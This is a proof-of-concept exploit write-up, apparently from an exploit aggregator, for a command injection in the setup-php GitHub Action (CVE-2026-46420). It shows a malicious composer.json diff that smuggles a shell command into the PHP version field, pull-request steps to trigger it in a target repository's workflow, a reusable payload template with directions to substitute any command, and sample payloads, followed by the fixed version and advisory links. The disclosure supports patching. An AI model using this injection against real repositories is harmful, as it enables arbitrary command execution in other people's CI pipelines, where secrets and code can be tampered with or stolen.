Share
## https://sploitus.com/exploit?id=40926991-C805-596C-B8C7-7F06AF0E7382
# CVE-2026-46420 PoC

Command injection in `shivammathur/setup-php` when the PHP version is loaded from repository controlled files.

Affected:

```text
>= 2.25.0, = 2.37.1
```

## PoC

The target repository already has a vulnerable workflow that checks out pull request contents and runs `setup-php@2.37.0`.

The attacker only changes `composer.json`.

```diff
-"php": "8.2"
+"php": [
+  "8.2;sed -i 's/FEATURE_FLAG=off/FEATURE_FLAG=modified-by-poc/' demo-app/.env.example #"
+]
```

When `setup-php` reads the PHP version from `composer.json`, the injected command is included in the generated shell script and executed.

Result:

```diff
-FEATURE_FLAG=off
+FEATURE_FLAG=modified-by-poc
```

## Reproduce

Create a branch from the target repository:

```sh
git checkout -b poc-test
```

Replace the clean `composer.json` with the PoC version:

```sh
cp attacker/composer.json composer.json
```

Commit and push:

```sh
git add composer.json
git commit -m "update composer config"
git push -u origin poc-test
```

Open a pull request from `poc-test` to `main`.

The Actions run should show that `demo-app/.env.example` was modified during the `setup-php` step.

## Changing the command

The payload format is:

```text
8.2; #
```

Current payload:

```text
8.2;sed -i 's/FEATURE_FLAG=off/FEATURE_FLAG=modified-by-poc/' demo-app/.env.example #
```

The executed command is:

```sh
sed -i 's/FEATURE_FLAG=off/FEATURE_FLAG=modified-by-poc/' demo-app/.env.example
```

To change what the PoC does, replace the command between `8.2;` and `#`.

Create a file:

```text
8.2;touch poc-executed #
```

Write to a file:

```text
8.2;printf 'poc executed\n' > poc-result.txt #
```

Print command output:

```text
8.2;id #
```

Example `composer.json`:

```json
{
  "config": {
    "platform": {
      "php": [
        "8.2;touch poc-executed #"
      ]
    }
  }
}
```

## Fix

Upgrade to `setup-php@2.37.1` or newer.

The same payload is rejected on the patched version.

## References

https://github.com/shivammathur/setup-php/security/advisories/GHSA-pqwm-q9pv-ph8r

https://github.com/shivammathur/setup-php/commit/eeef37e059fb5368a5bc8ed8ce45ff54bd39b80b